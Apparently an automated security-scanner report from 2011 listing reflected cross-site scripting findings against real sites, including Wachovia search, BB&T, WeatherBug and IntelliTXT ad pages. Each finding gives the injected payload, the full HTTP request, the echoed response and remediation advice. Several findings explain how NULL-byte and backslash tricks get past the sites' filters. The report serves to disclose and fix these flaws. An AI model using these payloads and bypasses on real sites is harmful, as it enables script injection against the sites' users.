HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 19:02:59 GMT Content-Length: 377
4.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.wachovia.com
Path:
/selfservice/microsites/wachoviaSearchEntry.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef9"><script>alert(1)</script>6d3f3e1bc4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do?aaef9"><script>alert(1)</script>6d3f3e1bc4b=1 HTTP/1.1 Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0E2F343A11D72B8481BC40D2D653F4B5; Path=/selfservice Content-Type: text/html;charset=UTF-8 Date: Thu, 03 Feb 2011 13:17:41 GMT Connection: close
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85494'%3balert(1)//dbe71432c4e was submitted in the h parameter. This input was echoed as 85494';alert(1)//dbe71432c4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4&w=300&h=25085494'%3balert(1)//dbe71432c4e&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 650 Date: Thu, 03 Feb 2011 16:23:48 GMT Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed62"%3balert(1)//eec28b3a643 was submitted in the pid parameter. This input was echoed as aed62";alert(1)//eec28b3a643 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4aed62"%3balert(1)//eec28b3a643&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 650 Date: Thu, 03 Feb 2011 16:23:46 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://smm.sitescout.com/disp?pid=21818F4aed62";alert(1)//eec28b3a643&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C1220000175%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D134%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woB ...[SNIP]...
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79fda'%3balert(1)//cbed4520d8d was submitted in the w parameter. This input was echoed as 79fda';alert(1)//cbed4520d8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4&w=30079fda'%3balert(1)//cbed4520d8d&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 650 Date: Thu, 03 Feb 2011 16:23:46 GMT Connection: close
4.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://thestreet.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bad9<script>alert(1)</script>6e86ca26221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /intellitxt/front.asp?ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1 HTTP/1.1 Host: thestreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA6yAEAAAEthmhrrQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+c+YAA-; Domain=.intellitxt.com; Expires=Mon, 04-Apr-2011 14:22:36 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/x-javascript Vary: Accept-Encoding Date: Thu, 03 Feb 2011 14:22:36 GMT Connection: close Content-Length: 8275
/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */ if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ ...[SNIP]... ad();}}};function itxtBegin(){ var itxturl='http://thestreet.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1'; itxturl+='&seid='+gSEID+'&sest='+gSEST; if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl); } else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() { $iTXT.js.load(itxturl); ...[SNIP]...
The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbce3\'%3balert(1)//470e2868204 was submitted in the sest parameter. This input was echoed as cbce3\\';alert(1)//470e2868204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /v3/door.jsp?ts=1296742745648&pagecl=2359&enc=&fv=101&muid=&ipid=10685&seid=0&sest=cbce3\'%3balert(1)//470e2868204 HTTP/1.1 Host: thestreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+LRYAA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: application/x-javascript;charset=iso-8859-1 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 14:22:49 GMT Connection: close Content-Length: 10430
/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */ try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={} ...[SNIP]... omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=0;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='cbce3\\';alert(1)//470e2868204';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL> ...[SNIP]...
The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531ee"%3balert(1)//40807062aa8 was submitted in the zcode parameter. This input was echoed as 531ee";alert(1)//40807062aa8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?zip=75201&zcode=6292531ee"%3balert(1)//40807062aa8 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 100657 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:53 GMT Connection: close
...[SNIP]... <script type="text/javascript"> var feedbackURL = "http://weather.weatherbug.com/feedback-form.html?zcode=6292531ee";alert(1)//40807062aa8®ion=8®ion_name=North America&country=US&country_name=USA&state_code=TX&state_name=Texas&zip=75201&city_name=Dallas&stat=DALS1"; </script> ...[SNIP]...
The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc was submitted in the zcode parameter. This input was echoed as 3b886"style="x:expression(alert(1))"e0fb95ae5dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?zip=75201&zcode=62923b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 104331 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:36 GMT Connection: close
The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c92\'%3balert(1)//fb3d6162354 was submitted in the zcode parameter. This input was echoed as b8c92\\';alert(1)//fb3d6162354 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?zip=75201&zcode=6292b8c92\'%3balert(1)//fb3d6162354 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 101771 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:35:04 GMT Connection: close
The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 was submitted in the zcode parameter. This input was echoed as 478ba"style="x:expression(alert(1))"78c9aed888 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?zip=75201&zcode=478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 103556 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:49 GMT Connection: close
4.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Business/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5e39"><script>alert(1)</script>409e4716c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5e39"><script>alert(1)</script>409e4716c9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/Business/Products/?%00f5e39"><script>alert(1)</script>409e4716c9d=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:13 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 53268 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Personal/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069b54"><script>alert(1)</script>e1573406ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b54"><script>alert(1)</script>e1573406ba9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/Personal/Products/?%0069b54"><script>alert(1)</script>e1573406ba9=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:49 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 40557 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002a618"><script>alert(1)</script>b69e85cef55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a618"><script>alert(1)</script>b69e85cef55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/?%002a618"><script>alert(1)</script>b69e85cef55=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:46 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 27477 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> < ...[SNIP]... <a href="/bbt/about/default.html?page=print&%002a618"><script>alert(1)</script>b69e85cef55=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;"> ...[SNIP]...
4.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a93d"><script>alert(1)</script>a2f88c48136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a93d"><script>alert(1)</script>a2f88c48136 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/privacyandsecurity/completeclientprotection/default.html?%007a93d"><script>alert(1)</script>a2f88c48136=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30854 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
4.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0012a7a"><script>alert(1)</script>5fb5315ccee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12a7a"><script>alert(1)</script>5fb5315ccee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/careers/?%0012a7a"><script>alert(1)</script>5fb5315ccee=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:51 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 33957 cache-control: private x-powered-by: ASP.NET
